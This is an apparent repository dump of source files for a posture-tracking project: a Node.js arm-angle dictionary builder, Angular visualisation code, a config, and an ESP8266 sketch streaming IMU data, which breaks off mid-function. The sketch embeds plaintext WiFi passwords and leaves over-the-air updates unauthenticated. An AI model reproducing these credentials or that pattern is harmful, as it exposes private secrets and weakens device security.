"text": "'use strict'\nconst THREE = require('three.js-node')\nconst INTERVAL = 5\nconst ANSWER_INTERVAL = INTERVAL\nconst EULER_ORDER = 'YZX'\nconst fs = require('fs')\nconst cluster = require('cluster')\nconst numCPUs = require('os').cpus().length * 4\nconst RIGHT_SHOULDER_Y = { MIN: -100, MAX: 40 }\nconst RIGHT_SHOULDER_Z = { MIN: -85, MAX: 70 }\nconst RIGHT_SHOULDER_X = { MIN: -30, MAX: 120 }\nconst RIGHT_ELBOW_Y = { MIN: 0, MAX: 150 }\nconst RIGHT_ELBOW_X = { MIN: -20, MAX: 100 }\nconst LEFT_SHOULDER_Y = { MIN: -40, MAX: 100 }\nconst LEFT_SHOULDER_Z = { MIN: -85, MAX: 70 }\nconst LEFT_SHOULDER_X = { MIN: -120, MAX: 30 }\nconst LEFT_ELBOW_Y = { MIN: -150, MAX: 0 }\nconst LEFT_ELBOW_X = { MIN: -100, MAX: 20 }\nconst DICT_Y = { MIN: -180, MAX: 180 }\nconst DICT_Z = { MIN: -180, MAX: 180 }\nconst DICT_X = { MIN: -180, MAX: 180 }\n\nfunction deg2rad (deg) {\n return deg * Math.PI / 180\n}\nfunction rad2Bucket (rad) {\n var ans = Math.floor(rad / deg2rad(ANSWER_INTERVAL)) * ANSWER_INTERVAL\n return ans === 180 ? 180 - ANSWER_INTERVAL : ans\n}\nfunction EulerToQuat (x, y, z) {\n var vectorEuler = new THREE.Euler(deg2rad(x), deg2rad(y), deg2rad(z), EULER_ORDER)\n return new THREE.Quaternion().setFromEuler(vectorEuler)\n}\n\nfunction masterProcess() {\n var workers = {}\n console.log(`Master ${process.pid} is running`)\n var rightArmIter = angleGenerator(RIGHT_SHOULDER_Y, RIGHT_SHOULDER_Z, RIGHT_SHOULDER_X, RIGHT_ELBOW_Y, RIGHT_ELBOW_X, INTERVAL)\n var rightDict = makeDict()\n var leftArmIter = angleGenerator(LEFT_SHOULDER_Y, LEFT_SHOULDER_Z, LEFT_SHOULDER_X, LEFT_ELBOW_Y, LEFT_ELBOW_X, INTERVAL)\n var leftDict = makeDict()\n var finishedRightCoreCount = 0;\n function handleWorkerMsg(msg) {\n switch(msg.event) {\n case 'ready':\n workers[msg.id].send({event:'right_job', params: rightArmIter.next().value})\n break\n case 'ans_right':\n if (msg.ans) {\n rightDict[msg.ans.bucket.y][msg.ans.bucket.z][msg.ans.bucket.x].push(msg.ans.val)\n }\n var rightArm = rightArmIter.next()\n if (rightArm.done) {\n console.log('one process finished rightArm')\n finishedRightCoreCount++\n leftArm = leftArmIter.next()\n workers[msg.id].send({event:'left_job', params: leftArm.value})\n if (finishedRightCoreCount === (numCPUs - 1)) {\n console.log('Finished building right dictionary')\n exportFile(rightDict, './rightDict_yzx.json')\n }\n } else {\n workers[msg.id].send({event:'right_job', params: rightArm.value})\n }\n break\n case 'ans_left':\n if (msg.ans) {\n leftDict[msg.ans.bucket.y][msg.ans.bucket.z][msg.ans.bucket.x].push(msg.ans.val)\n }\n var leftArm = leftArmIter.next()\n if (leftArm.done) {\n workers[msg.id].send({event: 'fin'})\n delete workers[msg.id]\n if (Object.keys(workers).length === 0) {\n console.log('Finished building left dictionary')\n exportFile(leftDict, './leftDict_yzx.json')\n }\n } else {\n workers[msg.id].send({event:'left_job', params: leftArm.value})\n }\n break\n }\n }\n\n function* angleGenerator(shoulderYRange, shoulderZRange, shoulderXRange, elbowYRange, elbowXRange, interval) {\n for (let shoulderY = shoulderYRange.MIN; shoulderY < shoulderYRange.MAX; shoulderY += interval) {\n for (let shoulderZ = shoulderZRange.MIN; shoulderZ < shoulderZRange.MAX; shoulderZ += interval) {\n for (let shoulderX = shoulderXRange.MIN; shoulderX < shoulderXRange.MAX; shoulderX += interval) {\n for (let elbowY = elbowYRange.MIN; elbowY < elbowYRange.MAX; elbowY += interval) {\n for (let elbowX = elbowXRange.MIN; elbowX < elbowXRange.MAX; elbowX += interval) {\n yield {shoulderY, shoulderZ, shoulderX, elbowY, elbowX}\n }\n }\n }\n }\n }\n }\n\n function makeDict() {\n var answerBuckets = {}\n for (let y = DICT_Y.MIN; y < DICT_Y.MAX; y += ANSWER_INTERVAL) {\n answerBuckets[y] = {}\n for (let z = DICT_Z.MIN; z < DICT_Z.MAX; z += ANSWER_INTERVAL) {\n answerBuckets[y][z] = {}\n for (let x = DICT_X.MIN; x < DICT_X.MAX; x += ANSWER_INTERVAL) {\n answerBuckets[y][z][x] = []\n }\n }\n }\n return answerBuckets\n }\n\n function exportFile(answerBuckets, fileName) {\n var finalDictionaryYZX = {}\n for (let y = DICT_Y.MIN; y < DICT_Y.MAX; y += ANSWER_INTERVAL) {\n finalDictionaryYZX[y] = {}\n for (let z = DICT_Z.MIN; z < DICT_Z.MAX; z += ANSWER_INTERVAL) {\n finalDictionaryYZX[y][z] = {}\n for (let x = DICT_X.MIN; x < DICT_X.MAX; x += ANSWER_INTERVAL) {\n let length = answerBuckets[y][z][x].length\n if (length > 0) {\n let shoulderXSum = 0\n let shoulderYSum = 0\n let shoulderZSum = 0\n let elbowYSum = 0\n let elbowXSum = 0\n answerBuckets[y][z][x].forEach(e => {\n shoulderXSum += e.shoulderX\n shoulderYSum += e.shoulderY\n shoulderZSum += e.shoulderZ\n elbowYSum += e.elbowY\n elbowXSum += e.elbowX\n })\n finalDictionaryYZX[y][z][x] = {\n shoulderX: shoulderXSum / length,\n shoulderY: shoulderYSum / length,\n shoulderZ: shoulderZSum / length,\n elbowY: elbowYSum / length,\n elbowX: elbowXSum / length\n }\n } else {\n finalDictionaryYZX[y][z][x] = {\n shoulderX: null,\n shoulderY: null,\n shoulderZ: null,\n elbowY: null,\n elbowX: null\n }\n }\n }\n }\n }\n fs.writeFile(fileName, JSON.stringify(finalDictionaryYZX), () => {\n console.log(`${fileName} write finished!`)\n })\n }\n\n for (let i = 1; i < numCPUs; i++) {\n console.log(`Forking process number ${i}...`)\n var worker = cluster.fork()\n workers[worker.process.pid] = worker\n worker.on('message', handleWorkerMsg)\n }\n}\n\nfunction childProcess() {\n process.on('message', handleMasterMsg)\n function handleMasterMsg(msg) {\n switch (msg.event) {\n case 'right_job':\n var entry = processRightData(msg.params)\n process.send({event:'ans_right', id: process.pid, ans: entry})\n break\n\n case 'left_job':\n var entry = processLeftData(msg.params)\n process.send({event:'ans_left', id: process.pid, ans: entry})\n break\n\n case 'fin':\n process.exit()\n break\n }\n }\n\n function processRightData(params) {\n let rightShoulder = (new THREE.Vector3(0, 0, 20))\n let rightElbow = new THREE.Vector3(28, 0, 0)\n let rightWrist = new THREE.Vector3(28, 0, 0)\n\n let upperArm = EulerToQuat(params.shoulderX, params.shoulderY, params.shoulderZ)\n let lowerArm = EulerToQuat(params.elbowX, params.elbowY, 0)\n\n rightWrist.applyQuaternion(lowerArm)\n rightElbow.applyQuaternion(upperArm)\n\n var rightWristHalf = rightWrist.clone()\n var rightElbowPos = rightElbow.clone()\n // Check if elbow is in torso/head\n rightElbowPos = rightElbowPos.add(rightShoulder)\n if (rightElbowPos.y < 0) {\n if ((rightElbowPos.z > -20) && (rightElbowPos.z < 20) && (rightElbowPos.x > -10) && (rightElbowPos.x < 10)) {\n return null\n }\n } else if (rightElbowPos.y < 20){\n if ((rightElbowPos.z > -10) && (rightElbowPos.z < 10) && (rightElbowPos.x > -10) && (rightElbowPos.x < 10)) {\n return null\n }\n }\n\n // Check if wrist is in torso/head\n rightWrist.add(rightElbow).add(rightShoulder)\n if (rightWrist.y < 0) {\n if ((rightWrist.z > -20) && (rightWrist.z < 20) && (rightWrist.x > -10) && (rightWrist.x < 10)) {\n return null\n }\n } else if (rightWrist.y < 20){\n if ((rightWrist.z > -10) && (rightWrist.z < 10) && (rightWrist.x > -10) && (rightWrist.x < 10)) {\n return null\n }\n }\n // Check if upper arm is in torso/head\n rightWristHalf.multiplyScalar(0.5)\n rightWristHalf.add(rightElbow).add(rightShoulder)\n if (rightWristHalf.y < 0) {\n if ((rightWristHalf.z > -20) && (rightWristHalf.z < 20) && (rightWristHalf.x > -10) && (rightWristHalf.x < 10)) {\n return null\n }\n } else if (rightWristHalf.y < 20){\n if ((rightWristHalf.z > -10) && (rightWristHalf.z < 10) && (rightWristHalf.x > -10) && (rightWristHalf.x < 10)) {\n return null\n }\n }\n\n let finalQuat = new THREE.Quaternion().multiplyQuaternions(lowerArm, upperArm)\n let finalEuler = new THREE.Euler().setFromQuaternion(finalQuat, EULER_ORDER)\n return {\n bucket: {\n y: rad2Bucket(finalEuler._y),\n z: rad2Bucket(finalEuler._z),\n x: rad2Bucket(finalEuler._x)\n },\n val: params\n }\n }\n\n function processLeftData(params) {\n let leftShoulder = (new THREE.Vector3(0, 0, -20))\n let leftElbow = new THREE.Vector3(28, 0, 0)\n let leftWrist = new THREE.Vector3(28, 0, 0)\n\n let upperArm = EulerToQuat(params.shoulderX, params.shoulderY, params.shoulderZ)\n let lowerArm = EulerToQuat(params.elbowX, params.elbowY, 0)\n\n leftWrist.applyQuaternion(lowerArm)\n leftElbow.applyQuaternion(upperArm)\n\n var leftWristHalf = leftWrist.clone()\n var leftElbowPos = leftElbow.clone()\n // Check if elbow is in torso/head\n leftElbowPos = leftElbowPos.add(leftShoulder)\n if (leftElbowPos.y < 0) {\n if ((leftElbowPos.z > -20) && (leftElbowPos.z < 20) && (leftElbowPos.x > -10) && (leftElbowPos.x < 10)) {\n return null\n }\n } else if (leftElbowPos.y < 20){\n if ((leftElbowPos.z > -10) && (leftElbowPos.z < 10) && (leftElbowPos.x > -10) && (leftElbowPos.x < 10)) {\n return null\n }\n }\n\n // Check if wrist is in torso/head\n leftWrist.add(leftElbow).add(leftShoulder)\n if (leftWrist.y < 0) {\n if ((leftWrist.z > -20) && (leftWrist.z < 20) && (leftWrist.x > -10) && (leftWrist.x < 10)) {\n return null\n }\n } else if (leftWrist.y < 20){\n if ((leftWrist.z > -10) && (leftWrist.z < 10) && (leftWrist.x > -10) && (leftWrist.x < 10)) {\n return null\n }\n }\n // Check if upper arm is in torso/head\n leftWristHalf.multiplyScalar(0.5)\n leftWristHalf.add(leftElbow).add(leftShoulder)\n if (leftWristHalf.y < 0) {\n if ((leftWristHalf.z > -20) && (leftWristHalf.z < 20) && (leftWristHalf.x > -10) && (leftWristHalf.x < 10)) {\n return null\n }\n } else if (leftWristHalf.y < 20){\n if ((leftWristHalf.z > -10) && (leftWristHalf.z < 10) && (leftWristHalf.x > -10) && (leftWristHalf.x < 10)) {\n return null\n }\n }\n\n let finalQuat = new THREE.Quaternion().multiplyQuaternions(lowerArm, upperArm)\n let finalEuler = new THREE.Euler().setFromQuaternion(finalQuat, EULER_ORDER)\n return {\n bucket: {\n y: rad2Bucket(finalEuler._y),\n z: rad2Bucket(finalEuler._z),\n x: rad2Bucket(finalEuler._x)\n },\n val: params\n }\n }\n\n process.send({event:'ready', id: process.pid})\n}\n\nif (cluster.isMaster) {\n masterProcess()\n} else {\n childProcess()\n}"
},
{
"alpha_fraction": 0.5630354881286621,
"alphanum_fraction": 0.6150550842285156,
"avg_line_length": 24.936508178710938,
"blob_id": "e9e82328ee3e807d830776d66e954be7d9981f7f",
"content_id": "676fee2d492a6ad9421ac91702f963a2c2016e39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 1634,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 63,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/middle-map/middle-map.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\nimport { SockService } from '../../services/sock.service';\nimport { DataModelService } from '../../services/data-model.service';\nimport { Observable } from 'rxjs/Observable';\n\n@Component({\n selector: 'app-middle-map',\n templateUrl: './middle-map.component.html',\n styleUrls: ['./middle-map.component.css']\n})\nexport class MiddleMapComponent implements OnInit {\n public status;\n // public points = [{x: -84.396, y: 33.775}, {x: -84.3962, y: 33.7756}];\n // public clusters = {\n // cluster1: {\n // points: [{x: -84.396, y: 33.775}, {x: -84.3962, y: 33.7756}],\n // color: '#3399CC'\n // },\n // cluster2: {\n // points: [{x: -84.391, y: 33.29}, {x: -84.3962, y: 33.7756}, {x: -84.4, y: 33.8}],\n // color: '#CC9933'\n // }\n // };\n public mapUpdateObservable: Observable<any> = this.dataModel.getNewMapUpdate()\n public colorPalette;\n public clusterPoints = {}\n\n\n constructor(private dataModel: DataModelService, private sock: SockService) {\n this.status = dataModel.status;\n this.colorPalette = dataModel.colorPalette;\n this.mapUpdateObservable.subscribe(msg => {\n this.clusterPoints = {}\n setTimeout((() => {\n this.clusterPoints = msg\n }).bind(this), 0)\n })\n }\n\n deepcopy(obj) {\n return JSON.parse(JSON.stringify(obj));\n }\n\n ngOnInit() {\n }\n\n getKeys(obj) {\n return Object.keys(obj);\n }\n\n onPointClick(p) {\n console.log(p);\n }\n\n getColor(clusterKey, alpha) {\n var color = this.deepcopy(this.dataModel.colorPalette[clusterKey])//.map(d => d/255)\n color.push(alpha)\n return color\n }\n\n\n\n}\n"
},
{
"alpha_fraction": 0.6695278882980347,
"alphanum_fraction": 0.716738224029541,
"avg_line_length": 32.42856979370117,
"blob_id": "0094d0a3bdba7e7aa1ae833fa75995ef93a7ce80",
"content_id": "3f3739a35cabb419ae60a8fa5569302488df8ce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 7,
"path": "/oriTrakHAR-master/rawDataVisServer/config.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "module.exports = {\n\tSOCKET_IO_PORT: 8088,\n\tDB_FOLDER: '/Users/zhaoyuhui/OriTrak_data',\n CLUSTER_DB_PATH: '/Users/zhaoyuhui/OriTrak_data/03_29_18_data/cluster.db',\n\t// DB_FOLDER: '/Users/zhaoyuhui/OriTrak_data',\n\tANSWER_INTERVAL: 5\n}"
},
{
"alpha_fraction": 0.6834094524383545,
"alphanum_fraction": 0.6834094524383545,
"avg_line_length": 25.280000686645508,
"blob_id": "df9d672a2f38a9842d76fbbd33bf1cecf8e72c89",
"content_id": "a0ffa9c4c6acb30dad5bface7b12a02ddf40817d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 657,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 25,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/shpere-hist/shpere-hist.component.spec.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { async, ComponentFixture, TestBed } from '@angular/core/testing';\n\nimport { ShpereHistComponent } from './shpere-hist.component';\n\ndescribe('ShpereHistComponent', () => {\n let component: ShpereHistComponent;\n let fixture: ComponentFixture<ShpereHistComponent>;\n\n beforeEach(async(() => {\n TestBed.configureTestingModule({\n declarations: [ ShpereHistComponent ]\n })\n .compileComponents();\n }));\n\n beforeEach(() => {\n fixture = TestBed.createComponent(ShpereHistComponent);\n component = fixture.componentInstance;\n fixture.detectChanges();\n });\n\n it('should create', () => {\n expect(component).toBeTruthy();\n });\n});\n"
},
{
"alpha_fraction": 0.8461538553237915,
"alphanum_fraction": 0.8461538553237915,
"avg_line_length": 25,
"blob_id": "1783842a30451014c83ed5947ddaf53ed848043d",
"content_id": "fa411feeaebe100b257ff5b6f68445ba47025350",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 2,
"path": "/oriTrakHAR-master/README.md",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "# oriTrakHAR\noriTrak for human activity recognition\n"
},
{
"alpha_fraction": 0.6222032308578491,
"alphanum_fraction": 0.6531170010566711,
"avg_line_length": 34.70121765136719,
"blob_id": "dd8427b155cde6c69a0f5f17ecf522169f183dc1",
"content_id": "282c75ab9a050ea12c8e48891fef86ab0a1071ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 5855,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 164,
"path": "/oriTrakHAR-master/rawDataVis/src/app/services/data-model.service.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Injectable } from '@angular/core';\nimport { Subject } from 'rxjs/Subject';\nimport { Observable } from 'rxjs/Observable';\n\n@Injectable()\nexport class DataModelService {\n dummyDate = new Date();\n public status = {\n torso : {\n quaternion: {w: 0, x: 0, y: 0, z: 0}\n },\n head: {\n quaternion: {w: 0, x: 0, y: 0, z: 0}\n },\n rightUpper: {\n quaternion: {w: 0, x: 0, y: 0, z: 0}\n },\n rightLower: {\n quaternion: {w: 0, x: 0, y: 0, z: 0}\n },\n leftUpper: {\n quaternion: {w: 0, x: 0, y: 0, z: 0}\n },\n leftLower: {\n quaternion: {w: 0, x: 0, y: 0, z: 0}\n },\n availableDates: {},\n availableClusters: {},\n selectedCluster: '',\n playing: false,\n playingTime: undefined,\n timeMin: this.dummyDate,\n timeMax: this.dummyDate,\n selectedTimeStart: this.dummyDate,\n selectedTimeEnd: this.dummyDate,\n animationStartTime: this.dummyDate,\n animationEndTime: this.dummyDate,\n histStartTime: this.dummyDate,\n histEndTime: this.dummyDate,\n selectedDate: '',\n selectedHistSource: 'Right Relative',\n availableHistSources: ['Right Relative', 'Left Relative', 'Head Relative', 'Torso Orient'],\n windowFixed: false,\n winPlaying: false,\n windowWidth: 60000,\n start_selected_end: [1, 2, 3, 5],\n windowPlaySlowDownFactor: 1,\n availableWindowPlaySlowDownFactors : [1, 1.5, 2, 2.5, 3],\n curDisplayClusterData: {},\n histMenuDisplayName: {\n 'Right Relative': 'Right Arm Orientation Relative to Torso',\n 'Left Relative': 'Left Arm Orientation Relative to Torso',\n 'Head Relative': 'Head Orientation Relative to Torso',\n 'Torso Orient': 'Torso Absolute Orientation'\n },\n clustersOnOff : {}\n };\n\n public clusterData = {};\n public colorPalette = [[165, 0, 38] , [215, 48, 39]\n , [244, 109, 67], [253, 174, 97], [254, 224, 139], [217, 239, 139]\n , [166 , 217, 106], [102, 189, 99], [26, 152, 80], [0, 104, 55]];\n\n newDateSelected = new Subject<any>();\n newHistUpdate = new Subject<any>();\n newMapUpdate = new Subject<any>();\n windowPlayInterval;\n winPlayRatio = 0.2;\n\n constructor() { }\n\n // public getPlayingTimeSubscribable(): Observable<Date> {\n // return this.status.playingTime.asObservable();\n // }\n public getNewDateSelectedSubscribable(): Observable<any> {\n return this.newDateSelected.asObservable();\n }\n public getNewHistUpdateSubscribable(): Observable<any> {\n return this.newHistUpdate.asObservable();\n }\n public getNewMapUpdate(): Observable<any> {\n return this.newMapUpdate.asObservable();\n }\n public updateStartTime(date) {\n this.status.selectedDate = date;\n this.status.timeMin = new Date(this.status.availableDates[date].min);\n this.status.timeMax = new Date(this.status.availableDates[date].max);\n this.status.animationStartTime = new Date(this.status.availableDates[date].min);\n this.status.animationEndTime = new Date(this.status.availableDates[date].min);\n this.status.animationEndTime.setSeconds(this.status.animationEndTime.getSeconds() + 60);\n this.status.histStartTime = new Date(this.status.timeMin.valueOf());\n this.status.histEndTime = new Date(this.status.timeMax.valueOf());\n console.log(this.status.availableDates[date]);\n console.log('call next!');\n this.newDateSelected.next(this.status.availableDates[date]);\n // setTimeout((() => {\n // }).apply(this), 10);\n }\n\n public updateRange() {\n this.newDateSelected.next(this.status.availableDates[this.status.selectedDate]);\n }\n public windowPlay() {\n //30000: 150\n //1800000: 1600\n let interval = (150 + (1600 - 150) / (1800000 - 30000) * this.status.windowWidth) * this.status.windowPlaySlowDownFactor;\n this.windowPlayInterval = setInterval((() => {\n if (this.status.start_selected_end[2] + this.status.windowWidth > this.status.start_selected_end[3]) {\n clearInterval(this.windowPlayInterval);\n this.status.winPlaying = false;\n }\n this.status.start_selected_end = [\n this.status.start_selected_end[0],\n this.status.start_selected_end[1] + this.status.windowWidth * this.winPlayRatio,\n this.status.start_selected_end[2] + this.status.windowWidth * this.winPlayRatio,\n this.status.start_selected_end[3]\n ];\n }).bind(this), interval);\n }\n\n public stopPlay() {\n if (this.windowPlayInterval) {\n clearInterval(this.windowPlayInterval);\n }\n this.windowPlayInterval = undefined;\n }\n\n public updateDisplayClusterData() {\n if (!this.status.selectedCluster) {\n return;\n }\n const allData = this.deepcopy(this.clusterData[this.status.availableClusters[this.status.selectedCluster]]);\n Object.keys(allData).forEach(cluster => {\n if (!this.status.clustersOnOff[cluster]) {\n return\n }\n var allData_cluster = {interest: [], notInterest: []};\n allData[cluster].forEach(d => {\n if ((d.timestamp >= this.status.selectedTimeStart.valueOf() )\n && (d.timestamp < this.status.selectedTimeEnd.valueOf() + 30000)) {\n if ((d.timestamp >= this.status.histStartTime.valueOf() )\n && (d.timestamp < this.status.histEndTime.valueOf() + 30000)) {\n allData_cluster.interest.push(d);\n } else {\n allData_cluster.notInterest.push(d);\n }\n }\n });\n allData[cluster] = allData_cluster;\n });\n this.status.curDisplayClusterData = allData;\n this.newMapUpdate.next(this.status.curDisplayClusterData);\n // console.log(this.status.curDisplayClusterData);\n // console.log(allData);\n\n // this.status.curDisplayClusterData = this.deepcopy(this.clusterData[this.status.availableClusters[this.status.selectedCluster]])\n // this.newMapUpdate.next(this.status.curDisplayClusterData);\n }\n\n deepcopy(obj) {\n return JSON.parse(JSON.stringify(obj));\n }\n\n}\n"
},
{
"alpha_fraction": 0.5678053498268127,
"alphanum_fraction": 0.5995878577232361,
"avg_line_length": 29.997543334960938,
"blob_id": "178e5795d029176bc3d53e825c846ed8d6903079",
"content_id": "8276c3fc3d86a040bdc3dedd70d92acdf83f45f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 12619,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 407,
"path": "/oriTrakHAR-master/sensorDataCollection/espBno055/espBno055.ino",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "#include <ESP8266WiFi.h>\n#include <ESP8266mDNS.h>\n#include <ArduinoOTA.h>\n\n#include <Adafruit_BNO055_modified.h>\n#include <Adafruit_Sensor.h>\n#include <utility/imumaths.h>\n\n#include \"TimerObject.h\"\n\n#define ESP8266\n#define SDA (0)\n#define SDA_AUX (2)\n#define SCL (4)\n#define SCL_AUX (5)\n#define BAUD_RATE (115200)\n#define BNO055_CAL_DELAY_MS (10)\n#define INTERVAL_100HZ (10)\n#define INTERVAL_20HZ (50)\n#define BOARD_LED (2)\n#define CAL_BLINK_COUNT (3)\n#define PORT (9000)\n#define PAYLOAD_BUFFER_SIZE (20000)\n#define RECEIVE_BUFFER_SIZE (8)\n#define TCP_CONNECT_FREEZE_MAX (250000) // ns\n#define TCP_CONNECT_FREEZE_MIN (100000) // ns\n#define LOST_SERVER_TIME (850000) // ns\n\nextern \"C\" {\n #include \"user_interface.h\"\n}\n\n// #define SAMPLE_DELAY_US (500)\n// const uint8_t* ssid = \"yjinms\";\n// const uint8_t* password = \"1fdd2EE3b448@f432@2f\";\n// const uint8_t* host = \"192.168.0.6\";\n\n/*\n * It seems client.write() is not always synchronous especially when\n * send buffer size is small (I could be wrong. The behavior of the\n * chip is wierd). Stuff in payloadBuf is copied to sendBuff and then\n * send to the server.\n*/\n\nuint8_t payloadBuf[PAYLOAD_BUFFER_SIZE];\n\nconst char* ssid = \"raspiDatalogger\";\nconst char* password = \"d]WJ/6Z\\\\jBu#]g0*Q]XT\";\nconst char* host = \"192.168.2.1\";\n\nconst uint32_t FLAG100 = 1 << 31;\n\nuint32_t led_val = 0;\nuint32_t working_counter = 0;\nuint32_t cal_counter = 0;\n\nTimerObject* timer_100Hz;\nTimerObject* timer_20Hz;\n\nuint64_t tcpLastConnectTimestamp = 0;\nuint64_t tcpReconnectWaitTime = 0;\nuint64_t deadTime = 0;\nuint32_t sanityCounter = 0;\n// volatile uint8_t magBuf[MAG_BUFFER_SIZE];\n\n/* Final payload format\n * NOTE: the chip doesn't like not-32bits-aligned wirte\n * field name data type\n * ------------------- ----------\n * sensor ID uint64_t\n * server timestamp uint64_t\n * receieve timestamp uint64_t\n * send timestamp uint64_t\n * base timestamp uint64_t\n * -------------------------------------------------------------\n * ------------Either---------------------Or-------------- /|\\\n * |Δtimestamp | FlAG100 uint32_t| Δtimestamp uint32_t| |\n * |quat_w float | magn_x float | |\n * |quat_x float | magn_y float | |\n * |quat_y float | magn_z float | |\n * |quat_z float | | repeat n\n * |gyro_x float | | |\n * |gyro_y float | | |\n * |gyro_z float | | |\n * |acc_x float | | |\n * |acc_y float | | |\n * |acc_z float | | |\n * ------------------------------------------------------- \\|/\n * -------------------------------------------------------------\n * 0xFFFFFFFF uint32_t\n * 0xFFFFFFFF uint32_t\n*/\n\nuint64_t* id_p = (uint64_t*) &payloadBuf[0];\nuint64_t* serverTimeStamp_p = (uint64_t*) &payloadBuf[8];\nuint64_t* clientReceiveTimeStamp_p = (uint64_t*) &payloadBuf[16];\nuint64_t* clientSendTimeStamp_p = (uint64_t*) &payloadBuf[24];\nuint64_t* clientBaseTimeStamp_p = (uint64_t*) &payloadBuf[32];\n\nfloat* payloadCursor_p = (float*) &payloadBuf[40];\nfloat* payloadCursor_origin = payloadCursor_p;\n\n// float* magCursor_p = (float*) magBuf;\n// float* magCursor_origin = magCursor_p;\n\nimu::Quaternion quat;\nimu::Vector<3> gyro, lacc, acc, magn;\n\n\nbool ota_flag = true;\nbool mySetup_finished = false;\nbool dead = false;\n\n\n\nAdafruit_BNO055 bno;\nWiFiClient client;\n\nvoid setup() {\n pinMode(BOARD_LED, OUTPUT);\n digitalWrite(BOARD_LED, 0);\n Serial.begin(BAUD_RATE);\n Serial.println(F(\"Booting\"));\n startWIFI();\n client = WiFiClient();\n Serial.println(F(\"Ready\"));\n Serial.print(F(\"IP address: \"));\n Serial.println(WiFi.localIP());\n\n // Attach chip id to each message\n uint32_t id = ESP.getChipId();\n id_p[0] = id;\n // client.setNoDelay(true);\n digitalWrite(BOARD_LED, 1);\n randomSeed(id);\n}\n\nvoid startWIFI() {\n WiFi.mode(WIFI_STA);\n WiFi.begin(ssid, password);\n while (WiFi.waitForConnectResult() != WL_CONNECTED) {\n //maybe replave the while loop\n Serial.println(F(\"Connection Failed! Rebooting...\"));\n delay(500);\n ESP.restart();\n }\n\n // Port defaults to 8266\n // ArduinoOTA.setPort(8266);\n\n // Hostname defaults to esp8266-[ChipID]\n // ArduinoOTA.setHostname(\"myesp8266\");\n\n // No authentication by default\n // ArduinoOTA.setPassword((const uint8_t *)\"343\");\n\n ArduinoOTA.onStart([]() {\n Serial.println(F(\"Start\"));\n });\n ArduinoOTA.onEnd([]() {\n Serial.println(F(\"\\nEnd\"));\n });\n ArduinoOTA.onProgress([](unsigned int progress, unsigned int total) {\n Serial.printf(\"Progress: %u%%\\r\", (progress / (total / 100)));\n });\n ArduinoOTA.onError([](ota_error_t error) {\n Serial.printf(\"Error[%u]: \", error);\n if (error == OTA_AUTH_ERROR) Serial.println(F(\"Auth Failed\"));\n else if (error == OTA_BEGIN_ERROR) Serial.println(F(\"Begin Failed\"));\n else if (error == OTA_CONNECT_ERROR) Serial.println(F(\"Connect Failed\"));\n else if (error == OTA_RECEIVE_ERROR) Serial.println(F(\"Receive Failed\"));\n else if (error == OTA_END_ERROR) Serial.println(F(\"End Failed\"));\n });\n ArduinoOTA.begin();\n}\n\n\nvoid readSensor100Hz() {\n if (((payloadCursor_p - payloadCursor_origin) * 4) > PAYLOAD_BUFFER_SIZE - 44) {\n clearBuffer();\n }\n ((uint32_t*)payloadCursor_p)[0] = ((uint32_t) (micros() - *clientBaseTimeStamp_p)) | FLAG100;\n\n quat = bno.getQuat();\n gyro = bno.getVector(Adafruit_BNO055::VECTOR_GYROSCOPE);\n acc = bno.getVector(Adafruit_BNO055::VECTOR_ACCELEROMETER);\n\n payloadCursor_p[1] = quat.w();\n // payloadCursor_p[2] = quat.x();\n // payloadCursor_p[3] = quat.y();\n // payloadCursor_p[4] = quat.z();\n payloadCursor_p[2] = quat.y(); //x\n payloadCursor_p[3] = quat.z(); //y\n payloadCursor_p[4] = quat.x(); //z\n // if ((payloadCursor_p[1] == payloadCursor_p[2]) && (payloadCursor_p[2] == payloadCursor_p[3]) && (payloadCursor_p[3] == payloadCursor_p[4])) {\n // ESP.restart();\n // }\n payloadCursor_p[5] = gyro.x();\n payloadCursor_p[6] = gyro.y();\n payloadCursor_p[7] = gyro.z();\n payloadCursor_p[8] = acc.x();\n payloadCursor_p[9] = acc.y();\n payloadCursor_p[10] = acc.z();\n\n payloadCursor_p = &payloadCursor_p[11];\n\n\n if ((payloadCursor_p[1] == payloadCursor_p[2]) && (payloadCursor_p[1] == payloadCursor_p[3]) && (payloadCursor_p[1] == payloadCursor_p[4])) {\n sanityCounter++;\n } else {\n sanityCounter = 0;\n }\n\n if (sanityCounter == 300) {\n Serial.println(F(\"Chip went crazy, all values are 0\\nRestart!\"));\n ESP.restart();\n }\n}\n\nvoid readSensor20Hz() {\n if (((payloadCursor_p - payloadCursor_origin) * 4) > PAYLOAD_BUFFER_SIZE - 16) {\n clearBuffer();\n }\n ((uint32_t*)payloadCursor_p)[0] = (uint32_t) (micros() - *clientBaseTimeStamp_p);\n\n magn = bno.getVector(Adafruit_BNO055::VECTOR_MAGNETOMETER);\n payloadCursor_p[1] = magn.x();\n payloadCursor_p[2] = magn.y();\n payloadCursor_p[3] = magn.z();\n\n payloadCursor_p = &payloadCursor_p[4];\n}\n\nvoid mySetup() {\n bno = Adafruit_BNO055(55, 0x28);\n if(!bno.begin(SDA, SCL)) {\n 